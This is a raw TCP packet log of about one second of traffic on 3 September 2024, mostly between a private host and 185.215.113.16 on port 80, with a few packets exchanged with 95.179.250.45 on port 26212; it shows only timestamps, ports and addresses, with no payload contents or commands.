Sep 3, 2024 17:13:07.985002041 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.985016108 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.985084057 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.985132933 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.985147953 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.985194921 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.985315084 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.985358953 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.985487938 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.985498905 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.985543013 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.985646963 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.985656977 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.985667944 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.985680103 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.985703945 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.985738993 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.986239910 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.986253023 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.986263990 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.986290932 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.986316919 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.986372948 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.986419916 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.986943960 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.986955881 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.986967087 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.986983061 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.986996889 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.986999989 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.987025023 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.987037897 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.987788916 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.987847090 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.987938881 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.987951040 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.987987041 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.987999916 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.988070965 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.988121986 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.047861099 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.047875881 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.047887087 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.047976971 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.133641005 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.133656025 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.133667946 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.133850098 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.133881092 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.133893013 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.133903980 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.133915901 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.133936882 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.133963108 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.134030104 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.134049892 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.134062052 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.134077072 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.134109974 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.134164095 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.134176016 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.134212017 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.134752035 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.134789944 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.134802103 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.134802103 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.134833097 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.134836912 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.134849072 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.134860992 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.134877920 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.134908915 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.135047913 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.135097027 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.135608912 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.135656118 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.135665894 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.135680914 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.135710955 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.135725975 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.135828972 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.135845900 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.135857105 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.135885000 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.135896921 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.135919094 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.135936975 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.136573076 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.136616945 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.136648893 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.136661053 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.136698961 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.136737108 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.136749029 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.136759043 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.136775970 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.136787891 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.136806011 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.136832952 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.137506008 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.137556076 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.137566090 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.137577057 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.137603045 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.137614965 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.137686014 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.137700081 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.137711048 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.137722969 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.137741089 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.137770891 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.138598919 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.138648033 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.138674021 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.138716936 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.144808054 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.144819975 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.144829988 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.144860983 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.144886971 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.144886971 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.144922018 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.144938946 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.144954920 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.144973993 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.283123970 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.283138037 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.283144951 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.283194065 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.283207893 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.283309937 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.283379078 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.283390045 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.283390045 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.283390045 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.283394098 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.283416986 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.283437014 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.283463001 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.283474922 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.283505917 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.283642054 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.283690929 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.283726931 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.283737898 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.283778906 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.285128117 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.285140038 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.285151958 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.285176992 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.285203934 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.285248995 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.285291910 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.285331011 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.285343885 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.285378933 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.285406113 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.285442114 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.285456896 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.285501003 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.285516024 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.285527945 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.285561085 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.285640955 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.285653114 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.285664082 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.285676003 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.285686016 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.285712004 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.286135912 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.286181927 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.286195040 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.286205053 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.286238909 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.286340952 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.286384106 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.286410093 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.286421061 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.286453962 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.286487103 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.286498070 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.286536932 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.286564112 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.286604881 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.286890984 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.286922932 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.286933899 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.286935091 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.286958933 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.287051916 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.287062883 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.287072897 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.287098885 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.287117958 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.287164927 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.287209988 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.287266016 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.287276030 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.287287951 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.287307024 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.287333965 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.287899017 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.287909985 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.287920952 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.287947893 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.287972927 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.288005114 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.288016081 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.288027048 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.288038969 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.288048983 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.288081884 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.288146973 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.288163900 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.288176060 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.288187981 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.288220882 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.288789034 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.288825035 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.288835049 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.288836002 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.288862944 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.288955927 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.288968086 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.288979053 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.288995028 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.289002895 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.289021015 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.289048910 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.289199114 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.289208889 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.289220095 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.289256096 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.290045023 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290086985 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290088892 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.290098906 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290122032 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.290142059 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.290201902 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290214062 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290224075 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290237904 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290247917 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.290277004 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.290334940 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290345907 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290380955 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.290394068 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290431023 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.290690899 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290744066 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.290765047 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290776968 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290817976 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.290849924 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290864944 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290875912 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.290900946 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.290925980 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.378065109 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:08.382081032 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382092953 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382105112 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382145882 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382158041 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382169008 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382180929 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382194042 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382277012 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.382277012 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.382277012 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.382277012 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.382335901 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382348061 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382380009 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.382395029 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.382458925 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382472038 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382514954 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.382525921 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.382591963 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382647038 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.382664919 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382678032 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382688999 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382703066 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.382724047 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.382762909 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.410749912 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:08.415637970 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:08.433144093 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433156013 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433166027 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433216095 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.433248997 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.433260918 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433273077 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433284044 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433298111 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433310986 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.433343887 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.433475971 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433486938 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433499098 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433523893 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.433553934 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.433598995 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433614016 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433624029 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433655977 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.433670998 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.433744907 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433757067 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433768034 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433798075 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.433824062 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.433887005 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433898926 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433908939 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433926105 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.433938980 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.433970928 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.435903072 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.435921907 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.435933113 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.435955048 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.435982943 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.436345100 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.436388016 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.436392069 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.436399937 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.436434031 CEST	49713	80	192.168.2.8	185.215.113.16
